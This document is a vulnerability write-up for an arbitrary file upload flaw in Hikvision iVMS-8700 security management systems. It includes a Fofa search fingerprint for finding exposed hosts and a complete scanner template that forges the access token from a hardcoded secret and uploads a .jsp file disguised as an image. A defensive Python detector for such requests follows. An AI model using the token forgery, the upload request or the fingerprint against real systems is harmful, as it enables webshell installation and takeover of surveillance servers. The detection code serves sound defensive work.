Hikvision iVMS integrated security system has a vulnerability that allows arbitrary file uploads. Attackers can exploit this vulnerability by obtaining the encryption key to create a forged token. By using the forged token, they can make requests to the "/resourceOperations/upload" interface to upload files of their choice. This can lead to gaining unauthorized webshell access on the server, enabling remote execution of malicious code.
Fofa: icon_hash="-911494769"
PoC code [published]
```yaml
id: hikvision-ivms-8700-fileupload

info:
  name: 海康威视 IVMS 8700 任意文件上传
  author: zan8in
  severity: critical
  verified: true
  description: |-
    Hikvision iVMS integrated security system has a vulnerability that allows arbitrary file uploads. Attackers can exploit this vulnerability by obtaining the encryption key to create a forged token. By using the forged token, they can make requests to the "/resourceOperations/upload" interface to upload files of their choice. This can lead to gaining unauthorized webshell access on the server, enabling remote execution of malicious code.
    Fofa: icon_hash="-911494769"
  reference:
    - https://blog.csdn.net/qq_41904294/article/details/130807691
    - https://github.com/sccmdaveli/hikvision-poc/blob/main/ivms-poc.py
    - https://mp.weixin.qq.com/s/khra2Z6U57kktxGooUEu-A
  tags: hikvision,ivms8700,fileupload
  created: 2024/01/06

set:
  url: request.url.scheme+"://"+request.url.host+"/eps/api/resourceOperations/uploadsecretKeyIbuilding"
  token: toUpper(md5(url))
  rboundary: randomLowercase(8)
  randstr: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /eps/api/resourceOperations/upload?token={{token}}
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"fileUploader\"; filename=\"{{randstr}}.jsp\"\r\n\
        Content-Type: image/jpeg\r\n\
        \r\n\
        {{randstr}}\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: response.status == 200 && response.body.bcontains(b'"success":true') && response.body.bcontains(b'"resourceName":')
expression: r0()
```
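Defender-side, as an added example that is not part of the template or the referenced PoC: a small Python check that parses a multipart upload request shaped like the one above and flags the two indicators it carries (a server-executable filename, and an image Content-Type declared for a non-image file). It assumes the request has been reconstructed from a proxy or WAF capture; the sample body is constructed and the token value is a placeholder.

```python
import re

UPLOAD_PATH = "/eps/api/resourceOperations/upload"
EXEC_EXTS = (".jsp", ".jspx", ".war", ".jar")          # server-side executable types
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif", ".bmp")  # what image/* parts should carry

def parse_multipart_parts(content_type: str, body: bytes):
    """Return (field name, filename, part Content-Type) for each multipart part."""
    m = re.search(r"boundary=([^;]+)", content_type)
    if not m:
        return []
    delimiter = b"--" + m.group(1).strip().encode()
    parts = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter "--boundary--"
        head = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")[0].decode("latin-1")
        name = re.search(r'(?<!file)name="([^"]*)"', head)
        fname = re.search(r'filename="([^"]*)"', head)
        ctype = re.search(r"Content-Type:\s*([^\r\n]+)", head, re.I)
        parts.append((name.group(1) if name else "", fname.group(1) if fname else "", ctype.group(1).strip() if ctype else ""))
    return parts

def upload_findings(method: str, target: str, content_type: str, body: bytes):
    """Reasons a request matches the upload pattern above; [] when nothing stands out."""
    if method != "POST" or target.split("?", 1)[0] != UPLOAD_PATH:
        return []
    findings = []
    for name, fname, ctype in parse_multipart_parts(content_type, body):
        lower = fname.lower()
        if lower.endswith(EXEC_EXTS):
            findings.append(f"{name}: server-executable filename {fname}")
        if ctype.startswith("image/") and not lower.endswith(IMAGE_EXTS):
            findings.append(f"{name}: declared {ctype} but {fname} is not an image")
    return findings

# Constructed sample request, shaped like the template body (token value is a placeholder).
BOUNDARY = "----WebKitFormBoundaryabcdefgh"
SAMPLE_CT = f"multipart/form-data; boundary={BOUNDARY}"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="fileUploader"; filename="abcdefgh.jsp"\r\n'
    "Content-Type: image/jpeg\r\n\r\n"
    "abcdefgh\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()

def scan_sample():
    return upload_findings("POST", UPLOAD_PATH + "?token=PLACEHOLDER", SAMPLE_CT, SAMPLE_BODY)
```

Either finding on its own is a reason to alert on this endpoint; a legitimate image upload produces none.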